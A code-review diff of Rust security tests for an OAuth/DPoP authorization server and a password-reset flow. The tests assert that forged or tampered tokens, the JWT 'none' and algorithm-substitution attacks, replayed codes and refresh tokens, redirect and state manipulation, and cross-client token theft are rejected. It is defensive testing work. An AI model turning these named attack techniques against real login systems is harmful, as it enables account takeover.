assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts");
897
}
898
+
899
#[tokio::test]
900
async fn test_oauth_token_works_with_sync_endpoints() {
901
let url = base_url().await;
+56
tests/oauth_security.rs
···
12
use sha2::{Digest, Sha256};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
use wiremock::matchers::{method, path};
15
fn no_redirect_client() -> reqwest::Client {
16
reqwest::Client::builder()
17
.redirect(redirect::Policy::none())
18
.build()
19
.unwrap()
20
}
21
fn generate_pkce() -> (String, String) {
22
let verifier_bytes: [u8; 32] = rand::random();
23
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
27
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
28
(code_verifier, code_challenge)
29
}
30
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
31
let mock_server = MockServer::start().await;
32
let client_id = mock_server.uri();
···
46
.await;
47
mock_server
48
}
49
async fn get_oauth_tokens(
50
http_client: &reqwest::Client,
51
url: &str,
···
117
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
118
(access_token, refresh_token, client_id)
119
}
120
#[tokio::test]
121
async fn test_security_forged_token_signature_rejected() {
122
let url = base_url().await;
···
134
.unwrap();
135
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
136
}
137
#[tokio::test]
138
async fn test_security_modified_payload_rejected() {
139
let url = base_url().await;
···
153
.unwrap();
154
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
155
}
156
#[tokio::test]
157
async fn test_security_algorithm_none_attack_rejected() {
158
let url = base_url().await;
···
181
.unwrap();
182
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
183
}
184
#[tokio::test]
185
async fn test_security_algorithm_substitution_attack_rejected() {
186
let url = base_url().await;
···
209
.unwrap();
210
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
211
}
212
#[tokio::test]
213
async fn test_security_expired_token_rejected() {
214
let url = base_url().await;
···
237
.unwrap();
238
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
239
}
240
#[tokio::test]
241
async fn test_security_pkce_plain_method_rejected() {
242
let url = base_url().await;
···
264
"Error should mention S256 requirement"
265
);
266
}
267
#[tokio::test]
268
async fn test_security_pkce_missing_challenge_rejected() {
269
let url = base_url().await;
···
283
.unwrap();
284
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
285
}
286
#[tokio::test]
287
async fn test_security_pkce_wrong_verifier_rejected() {
288
let url = base_url().await;
···
352
let body: Value = token_res.json().await.unwrap();
353
assert_eq!(body["error"], "invalid_grant");
354
}
355
#[tokio::test]
356
async fn test_security_authorization_code_replay_attack() {
357
let url = base_url().await;
···
434
let body: Value = replay_res.json().await.unwrap();
435
assert_eq!(body["error"], "invalid_grant");
436
}
437
#[tokio::test]
438
async fn test_security_refresh_token_replay_attack() {
439
let url = base_url().await;
···
550
"Token family should be revoked after replay detection"
551
);
552
}
553
#[tokio::test]
554
async fn test_security_redirect_uri_manipulation() {
555
let url = base_url().await;
···
573
.unwrap();
574
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
575
}
576
#[tokio::test]
577
async fn test_security_deactivated_account_blocked() {
578
let url = base_url().await;
···
639
let body: Value = auth_res.json().await.unwrap();
640
assert_eq!(body["error"], "access_denied");
641
}
642
#[tokio::test]
643
async fn test_security_url_injection_in_state_parameter() {
644
let url = base_url().await;
···
710
location
711
);
712
}
713
#[tokio::test]
714
async fn test_security_cross_client_token_theft() {
715
let url = base_url().await;
···
789
"Error should mention client_id mismatch"
790
);
791
}
792
#[test]
793
fn test_security_dpop_nonce_tamper_detection() {
794
let secret = b"test-dpop-secret-32-bytes-long!!";
···
803
let result = verifier.validate_nonce(&tampered_nonce);
804
assert!(result.is_err(), "Tampered nonce should be rejected");
805
}
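This test and the next make sense for a stateless, MAC-style nonce: the verifier derives the nonce from its secret, so it can validate without storing anything, and a flipped bit or a different secret fails. The sketch below is a generic HMAC-SHA256 construction to illustrate the idea; it assumes the hmac crate and is not necessarily what the verifier under test does internally.
// Illustrative only: nonce = payload || HMAC-SHA256(secret, payload).
fn demo_make_nonce(secret: &[u8], payload: &[u8]) -> Vec<u8> {
    use hmac::{Hmac, Mac};
    let mut mac = Hmac::<Sha256>::new_from_slice(secret).expect("HMAC accepts any key length");
    mac.update(payload);
    [payload, mac.finalize().into_bytes().as_slice()].concat()
}

fn demo_check_nonce(secret: &[u8], nonce: &[u8]) -> bool {
    use hmac::{Hmac, Mac};
    if nonce.len() < 32 {
        return false;
    }
    let (payload, tag) = nonce.split_at(nonce.len() - 32);
    let mut mac = Hmac::<Sha256>::new_from_slice(secret).expect("HMAC accepts any key length");
    mac.update(payload);
    mac.verify_slice(tag).is_ok() // constant-time tag comparison
}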
806
#[test]
807
fn test_security_dpop_nonce_cross_server_rejected() {
808
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
813
let result = verifier2.validate_nonce(&nonce_from_server1);
814
assert!(result.is_err(), "Nonce from different server should be rejected");
815
}
816
#[test]
817
fn test_security_dpop_proof_signature_tampering() {
818
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
851
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
852
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
853
}
854
#[test]
855
fn test_security_dpop_proof_key_substitution() {
856
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
888
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
889
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
890
}
891
#[test]
892
fn test_security_jwk_thumbprint_consistency() {
893
let jwk = DPoPJwk {
···
905
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
906
}
907
}
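Determinism here follows from RFC 7638: the thumbprint is the unpadded base64url SHA-256 of a canonical JSON object holding only the key's required members in lexicographic order ("crv", "kty", "x", "y" for an EC key). A from-scratch sketch using the imports already in this file; it assumes x and y are plain base64url strings that need no JSON escaping:
// RFC 7638 thumbprint for an EC JWK, computed directly from its members.
fn ec_jwk_thumbprint(crv: &str, x: &str, y: &str) -> String {
    let canonical = format!(r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#, crv, x, y);
    URL_SAFE_NO_PAD.encode(Sha256::digest(canonical.as_bytes()))
}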
908
#[test]
909
fn test_security_dpop_iat_clock_skew_limits() {
910
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
956
}
957
}
958
}
959
#[test]
960
fn test_security_dpop_method_case_insensitivity() {
961
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
992
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
993
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
994
}
995
#[tokio::test]
996
async fn test_security_invalid_grant_type_rejected() {
997
let url = base_url().await;
···
1024
);
1025
}
1026
}
1027
#[tokio::test]
1028
async fn test_security_token_with_wrong_typ_rejected() {
1029
let url = base_url().await;
···
1066
);
1067
}
1068
}
1069
#[tokio::test]
1070
async fn test_security_missing_required_claims_rejected() {
1071
let url = base_url().await;
···
1098
);
1099
}
1100
}
1101
#[tokio::test]
1102
async fn test_security_malformed_tokens_rejected() {
1103
let url = base_url().await;
···
1130
);
1131
}
1132
}
1133
#[tokio::test]
1134
async fn test_security_authorization_header_formats() {
1135
let url = base_url().await;
···
1175
);
1176
}
1177
}
1178
#[tokio::test]
1179
async fn test_security_no_authorization_header() {
1180
let url = base_url().await;
···
1186
.unwrap();
1187
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1188
}
1189
#[tokio::test]
1190
async fn test_security_empty_authorization_header() {
1191
let url = base_url().await;
···
1198
.unwrap();
1199
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1200
}
1201
#[tokio::test]
1202
async fn test_security_revoked_token_rejected() {
1203
let url = base_url().await;
···
1219
let introspect_body: Value = introspect_res.json().await.unwrap();
1220
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1221
}
1222
#[tokio::test]
1223
#[ignore = "rate limiting is disabled in test environment"]
1224
async fn test_security_oauth_authorize_rate_limiting() {
···
1274
rate_limited_count
1275
);
1276
}
1277
fn create_dpop_proof(
1278
method: &str,
1279
uri: &str,
···
1317
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1318
format!("{}.{}", signing_input, signature_b64)
1319
}
1320
#[test]
1321
fn test_dpop_nonce_generation() {
1322
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1326
assert!(!nonce1.is_empty());
1327
assert!(!nonce2.is_empty());
1328
}
1329
#[test]
1330
fn test_dpop_nonce_validation_success() {
1331
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1334
let result = verifier.validate_nonce(&nonce);
1335
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1336
}
1337
#[test]
1338
fn test_dpop_nonce_wrong_secret() {
1339
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1344
let result = verifier2.validate_nonce(&nonce);
1345
assert!(result.is_err(), "Nonce from different secret should fail");
1346
}
1347
#[test]
1348
fn test_dpop_nonce_invalid_format() {
1349
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1352
assert!(verifier.validate_nonce("").is_err());
1353
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1354
}
1355
#[test]
1356
fn test_jwk_thumbprint_ec_p256() {
1357
let jwk = DPoPJwk {
···
1366
assert!(!tp.is_empty());
1367
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1368
}
1369
#[test]
1370
fn test_jwk_thumbprint_ec_secp256k1() {
1371
let jwk = DPoPJwk {
···
1377
let thumbprint = compute_jwk_thumbprint(&jwk);
1378
assert!(thumbprint.is_ok());
1379
}
1380
#[test]
1381
fn test_jwk_thumbprint_okp_ed25519() {
1382
let jwk = DPoPJwk {
···
1388
let thumbprint = compute_jwk_thumbprint(&jwk);
1389
assert!(thumbprint.is_ok());
1390
}
1391
#[test]
1392
fn test_jwk_thumbprint_missing_crv() {
1393
let jwk = DPoPJwk {
···
1399
let thumbprint = compute_jwk_thumbprint(&jwk);
1400
assert!(thumbprint.is_err());
1401
}
1402
#[test]
1403
fn test_jwk_thumbprint_missing_x() {
1404
let jwk = DPoPJwk {
···
1410
let thumbprint = compute_jwk_thumbprint(&jwk);
1411
assert!(thumbprint.is_err());
1412
}
1413
#[test]
1414
fn test_jwk_thumbprint_missing_y_for_ec() {
1415
let jwk = DPoPJwk {
···
1421
let thumbprint = compute_jwk_thumbprint(&jwk);
1422
assert!(thumbprint.is_err());
1423
}
1424
#[test]
1425
fn test_jwk_thumbprint_unsupported_key_type() {
1426
let jwk = DPoPJwk {
···
1432
let thumbprint = compute_jwk_thumbprint(&jwk);
1433
assert!(thumbprint.is_err());
1434
}
1435
#[test]
1436
fn test_jwk_thumbprint_deterministic() {
1437
let jwk = DPoPJwk {
···
1444
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1445
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1446
}
1447
#[test]
1448
fn test_dpop_proof_invalid_format() {
1449
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1453
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1454
assert!(result.is_err());
1455
}
1456
#[test]
1457
fn test_dpop_proof_invalid_typ() {
1458
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1479
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1480
assert!(result.is_err());
1481
}
1482
#[test]
1483
fn test_dpop_proof_method_mismatch() {
1484
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1487
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1488
assert!(result.is_err());
1489
}
1490
#[test]
1491
fn test_dpop_proof_uri_mismatch() {
1492
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1495
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1496
assert!(result.is_err());
1497
}
1498
#[test]
1499
fn test_dpop_proof_iat_too_old() {
1500
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1503
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1504
assert!(result.is_err());
1505
}
1506
#[test]
1507
fn test_dpop_proof_iat_future() {
1508
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1511
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1512
assert!(result.is_err());
1513
}
1514
#[test]
1515
fn test_dpop_proof_ath_mismatch() {
1516
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1530
);
1531
assert!(result.is_err());
1532
}
1533
#[test]
1534
fn test_dpop_proof_missing_ath_when_required() {
1535
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1543
);
1544
assert!(result.is_err());
1545
}
1546
#[test]
1547
fn test_dpop_proof_uri_ignores_query_params() {
1548
let secret = b"test-dpop-secret-32-bytes-long!!";
···
12
use sha2::{Digest, Sha256};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
use wiremock::matchers::{method, path};
15
+
16
fn no_redirect_client() -> reqwest::Client {
17
reqwest::Client::builder()
18
.redirect(redirect::Policy::none())
19
.build()
20
.unwrap()
21
}
22
+
23
fn generate_pkce() -> (String, String) {
24
let verifier_bytes: [u8; 32] = rand::random();
25
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
29
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
30
(code_verifier, code_challenge)
31
}
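// Illustrative sketch, not part of this diff: with the S256 method that
// test_security_pkce_plain_method_rejected insists on (RFC 7636), the
// code_challenge is the unpadded base64url SHA-256 digest of the
// code_verifier string. The helper name below is hypothetical.
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
use sha2::{Digest, Sha256};

fn s256_challenge(code_verifier: &str) -> String {
    URL_SAFE_NO_PAD.encode(Sha256::digest(code_verifier.as_bytes()))
}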
32
+
33
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
34
let mock_server = MockServer::start().await;
35
let client_id = mock_server.uri();
···
49
.await;
50
mock_server
51
}
52
+
53
async fn get_oauth_tokens(
54
http_client: &reqwest::Client,
55
url: &str,
···
121
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
122
(access_token, refresh_token, client_id)
123
}
124
+
125
#[tokio::test]
126
async fn test_security_forged_token_signature_rejected() {
127
let url = base_url().await;
···
139
.unwrap();
140
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
141
}
142
+
143
#[tokio::test]
144
async fn test_security_modified_payload_rejected() {
145
let url = base_url().await;
···
159
.unwrap();
160
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
161
}
162
+
163
#[tokio::test]
164
async fn test_security_algorithm_none_attack_rejected() {
165
let url = base_url().await;
···
188
.unwrap();
189
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
190
}
191
+
192
#[tokio::test]
193
async fn test_security_algorithm_substitution_attack_rejected() {
194
let url = base_url().await;
···
217
.unwrap();
218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
219
}
220
+
221
#[tokio::test]
222
async fn test_security_expired_token_rejected() {
223
let url = base_url().await;
···
246
.unwrap();
247
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
248
}
249
+
250
#[tokio::test]
251
async fn test_security_pkce_plain_method_rejected() {
252
let url = base_url().await;
···
274
"Error should mention S256 requirement"
275
);
276
}
277
+
278
#[tokio::test]
279
async fn test_security_pkce_missing_challenge_rejected() {
280
let url = base_url().await;
···
294
.unwrap();
295
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
296
}
297
+
298
#[tokio::test]
299
async fn test_security_pkce_wrong_verifier_rejected() {
300
let url = base_url().await;
···
364
let body: Value = token_res.json().await.unwrap();
365
assert_eq!(body["error"], "invalid_grant");
366
}
367
+
368
#[tokio::test]
369
async fn test_security_authorization_code_replay_attack() {
370
let url = base_url().await;
···
447
let body: Value = replay_res.json().await.unwrap();
448
assert_eq!(body["error"], "invalid_grant");
449
}
450
+
451
#[tokio::test]
452
async fn test_security_refresh_token_replay_attack() {
453
let url = base_url().await;
···
564
"Token family should be revoked after replay detection"
565
);
566
}
567
+
568
#[tokio::test]
569
async fn test_security_redirect_uri_manipulation() {
570
let url = base_url().await;
···
588
.unwrap();
589
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
590
}
591
+
592
#[tokio::test]
593
async fn test_security_deactivated_account_blocked() {
594
let url = base_url().await;
···
655
let body: Value = auth_res.json().await.unwrap();
656
assert_eq!(body["error"], "access_denied");
657
}
658
+
659
#[tokio::test]
660
async fn test_security_url_injection_in_state_parameter() {
661
let url = base_url().await;
···
727
location
728
);
729
}
730
+
731
#[tokio::test]
732
async fn test_security_cross_client_token_theft() {
733
let url = base_url().await;
···
807
"Error should mention client_id mismatch"
808
);
809
}
810
+
811
#[test]
812
fn test_security_dpop_nonce_tamper_detection() {
813
let secret = b"test-dpop-secret-32-bytes-long!!";
···
822
let result = verifier.validate_nonce(&tampered_nonce);
823
assert!(result.is_err(), "Tampered nonce should be rejected");
824
}
825
+
826
#[test]
827
fn test_security_dpop_nonce_cross_server_rejected() {
828
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
833
let result = verifier2.validate_nonce(&nonce_from_server1);
834
assert!(result.is_err(), "Nonce from different server should be rejected");
835
}
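// Pure assumption about the verifier's internals, for illustration only: one
// way to get the behaviour these nonce tests pin down (a nonce validates only
// under the secret that minted it, and any tampering is detected) is a
// stateless HMAC-signed nonce. The hmac/sha2 usage here is hypothetical.
use hmac::{Hmac, Mac};
use sha2::Sha256;

fn mint_nonce_sketch(secret: &[u8], timestamp_secs: u64) -> Vec<u8> {
    let mut mac =
        Hmac::<Sha256>::new_from_slice(secret).expect("HMAC accepts keys of any length");
    mac.update(&timestamp_secs.to_be_bytes());
    // nonce = timestamp || tag; a verifier recomputes the tag with its own secret
    // and rejects the nonce if either part has been altered.
    let mut nonce = timestamp_secs.to_be_bytes().to_vec();
    nonce.extend_from_slice(mac.finalize().into_bytes().as_slice());
    nonce
}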
836
+
837
#[test]
838
fn test_security_dpop_proof_signature_tampering() {
839
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
872
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
873
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
874
}
875
+
876
#[test]
877
fn test_security_dpop_proof_key_substitution() {
878
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
910
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
911
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
912
}
913
+
914
#[test]
915
fn test_security_jwk_thumbprint_consistency() {
916
let jwk = DPoPJwk {
···
928
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
929
}
930
}
931
+
932
#[test]
933
fn test_security_dpop_iat_clock_skew_limits() {
934
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
980
}
981
}
982
}
983
+
984
#[test]
985
fn test_security_dpop_method_case_insensitivity() {
986
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
1017
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1018
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
1019
}
1020
+
1021
#[tokio::test]
1022
async fn test_security_invalid_grant_type_rejected() {
1023
let url = base_url().await;
···
1050
);
1051
}
1052
}
1053
+
1054
#[tokio::test]
1055
async fn test_security_token_with_wrong_typ_rejected() {
1056
let url = base_url().await;
···
1093
);
1094
}
1095
}
1096
+
1097
#[tokio::test]
1098
async fn test_security_missing_required_claims_rejected() {
1099
let url = base_url().await;
···
1126
);
1127
}
1128
}
1129
+
1130
#[tokio::test]
1131
async fn test_security_malformed_tokens_rejected() {
1132
let url = base_url().await;
···
1159
);
1160
}
1161
}
1162
+
1163
#[tokio::test]
1164
async fn test_security_authorization_header_formats() {
1165
let url = base_url().await;
···
1205
);
1206
}
1207
}
1208
+
1209
#[tokio::test]
1210
async fn test_security_no_authorization_header() {
1211
let url = base_url().await;
···
1217
.unwrap();
1218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1219
}
1220
+
1221
#[tokio::test]
1222
async fn test_security_empty_authorization_header() {
1223
let url = base_url().await;
···
1230
.unwrap();
1231
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1232
}
1233
+
1234
#[tokio::test]
1235
async fn test_security_revoked_token_rejected() {
1236
let url = base_url().await;
···
1252
let introspect_body: Value = introspect_res.json().await.unwrap();
1253
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1254
}
1255
+
1256
#[tokio::test]
1257
#[ignore = "rate limiting is disabled in test environment"]
1258
async fn test_security_oauth_authorize_rate_limiting() {
···
1308
rate_limited_count
1309
);
1310
}
1311
+
1312
fn create_dpop_proof(
1313
method: &str,
1314
uri: &str,
···
1352
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1353
format!("{}.{}", signing_input, signature_b64)
1354
}
1355
+
1356
#[test]
1357
fn test_dpop_nonce_generation() {
1358
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1362
assert!(!nonce1.is_empty());
1363
assert!(!nonce2.is_empty());
1364
}
1365
+
1366
#[test]
1367
fn test_dpop_nonce_validation_success() {
1368
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1371
let result = verifier.validate_nonce(&nonce);
1372
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1373
}
1374
+
1375
#[test]
1376
fn test_dpop_nonce_wrong_secret() {
1377
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1382
let result = verifier2.validate_nonce(&nonce);
1383
assert!(result.is_err(), "Nonce from different secret should fail");
1384
}
1385
+
1386
#[test]
1387
fn test_dpop_nonce_invalid_format() {
1388
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1391
assert!(verifier.validate_nonce("").is_err());
1392
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1393
}
1394
+
1395
#[test]
1396
fn test_jwk_thumbprint_ec_p256() {
1397
let jwk = DPoPJwk {
···
1406
assert!(!tp.is_empty());
1407
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1408
}
1409
+
1410
#[test]
1411
fn test_jwk_thumbprint_ec_secp256k1() {
1412
let jwk = DPoPJwk {
···
1418
let thumbprint = compute_jwk_thumbprint(&jwk);
1419
assert!(thumbprint.is_ok());
1420
}
1421
+
1422
#[test]
1423
fn test_jwk_thumbprint_okp_ed25519() {
1424
let jwk = DPoPJwk {
···
1430
let thumbprint = compute_jwk_thumbprint(&jwk);
1431
assert!(thumbprint.is_ok());
1432
}
1433
+
1434
#[test]
1435
fn test_jwk_thumbprint_missing_crv() {
1436
let jwk = DPoPJwk {
···
1442
let thumbprint = compute_jwk_thumbprint(&jwk);
1443
assert!(thumbprint.is_err());
1444
}
1445
+
1446
#[test]
1447
fn test_jwk_thumbprint_missing_x() {
1448
let jwk = DPoPJwk {
···
1454
let thumbprint = compute_jwk_thumbprint(&jwk);
1455
assert!(thumbprint.is_err());
1456
}
1457
+
1458
#[test]
1459
fn test_jwk_thumbprint_missing_y_for_ec() {
1460
let jwk = DPoPJwk {
···
1466
let thumbprint = compute_jwk_thumbprint(&jwk);
1467
assert!(thumbprint.is_err());
1468
}
1469
+
1470
#[test]
1471
fn test_jwk_thumbprint_unsupported_key_type() {
1472
let jwk = DPoPJwk {
···
1478
let thumbprint = compute_jwk_thumbprint(&jwk);
1479
assert!(thumbprint.is_err());
1480
}
1481
+
1482
#[test]
1483
fn test_jwk_thumbprint_deterministic() {
1484
let jwk = DPoPJwk {
···
1491
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1492
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1493
}
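// Illustrative sketch, not code from this diff: the thumbprints these tests
// exercise follow RFC 7638 -- serialize only the required JWK members in
// lexicographic key order with no whitespace, hash with SHA-256, and encode
// the digest as unpadded base64url (which is why the charset assertion above
// allows only alphanumerics, '-' and '_'). The helper below covers the EC
// case only and is hypothetical.
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
use sha2::{Digest, Sha256};

fn ec_jwk_thumbprint_sketch(crv: &str, x: &str, y: &str) -> String {
    // Required members for kty "EC": crv, kty, x, y (already in lexicographic order).
    let canonical = format!(r#"{{"crv":"{crv}","kty":"EC","x":"{x}","y":"{y}"}}"#);
    URL_SAFE_NO_PAD.encode(Sha256::digest(canonical.as_bytes()))
}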
1494
+
1495
#[test]
1496
fn test_dpop_proof_invalid_format() {
1497
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1501
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1502
assert!(result.is_err());
1503
}
1504
+
1505
#[test]
1506
fn test_dpop_proof_invalid_typ() {
1507
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1528
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1529
assert!(result.is_err());
1530
}
1531
+
1532
#[test]
1533
fn test_dpop_proof_method_mismatch() {
1534
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1537
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1538
assert!(result.is_err());
1539
}
1540
+
1541
#[test]
1542
fn test_dpop_proof_uri_mismatch() {
1543
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1546
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1547
assert!(result.is_err());
1548
}
1549
+
1550
#[test]
1551
fn test_dpop_proof_iat_too_old() {
1552
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1555
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1556
assert!(result.is_err());
1557
}
1558
+
1559
#[test]
1560
fn test_dpop_proof_iat_future() {
1561
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1564
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1565
assert!(result.is_err());
1566
}
1567
+
1568
#[test]
1569
fn test_dpop_proof_ath_mismatch() {
1570
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1584
);
1585
assert!(result.is_err());
1586
}
1587
+
1588
#[test]
1589
fn test_dpop_proof_missing_ath_when_required() {
1590
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1598
);
1599
assert!(result.is_err());
1600
}
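// Illustrative sketch (assumptions follow RFC 9449, not this codebase): the
// "ath" claim that test_dpop_proof_ath_mismatch exercises is the unpadded
// base64url SHA-256 hash of the access token the proof is bound to, and the
// "htu" comparison strips query and fragment, which is what
// test_dpop_proof_uri_ignores_query_params (below) relies on. Helper names
// are hypothetical.
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
use sha2::{Digest, Sha256};

fn expected_ath(access_token: &str) -> String {
    URL_SAFE_NO_PAD.encode(Sha256::digest(access_token.as_bytes()))
}

fn normalize_htu(htu: &str) -> &str {
    // Drop the fragment first, then the query string, before comparing.
    let no_fragment = htu.split('#').next().unwrap_or(htu);
    no_fragment.split('?').next().unwrap_or(no_fragment)
}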
1601
+
1602
#[test]
1603
fn test_dpop_proof_uri_ignores_query_params() {
1604
let secret = b"test-dpop-secret-32-bytes-long!!";
+9
tests/password_reset.rs
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
#[tokio::test]
16
async fn test_request_password_reset_creates_code() {
17
let client = common::client();
···
51
assert!(code.contains('-'));
52
assert_eq!(code.len(), 11);
53
}
54
#[tokio::test]
55
async fn test_request_password_reset_unknown_email_returns_ok() {
56
let client = common::client();
···
63
.expect("Failed to request password reset");
64
assert_eq!(res.status(), StatusCode::OK);
65
}
66
#[tokio::test]
67
async fn test_reset_password_with_valid_token() {
68
let client = common::client();
···
142
.expect("Failed to login attempt");
143
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
144
}
145
#[tokio::test]
146
async fn test_reset_password_with_invalid_token() {
147
let client = common::client();
···
159
let body: Value = res.json().await.expect("Invalid JSON");
160
assert_eq!(body["error"], "InvalidToken");
161
}
162
#[tokio::test]
163
async fn test_reset_password_with_expired_token() {
164
let client = common::client();
···
213
let body: Value = res.json().await.expect("Invalid JSON");
214
assert_eq!(body["error"], "ExpiredToken");
215
}
216
#[tokio::test]
217
async fn test_reset_password_invalidates_sessions() {
218
let client = common::client();
···
275
.expect("Failed to get session");
276
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
277
}
278
#[tokio::test]
279
async fn test_request_password_reset_empty_email() {
280
let client = common::client();
···
289
let body: Value = res.json().await.expect("Invalid JSON");
290
assert_eq!(body["error"], "InvalidRequest");
291
}
292
#[tokio::test]
293
async fn test_reset_password_creates_notification() {
294
let pool = get_pool().await;
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
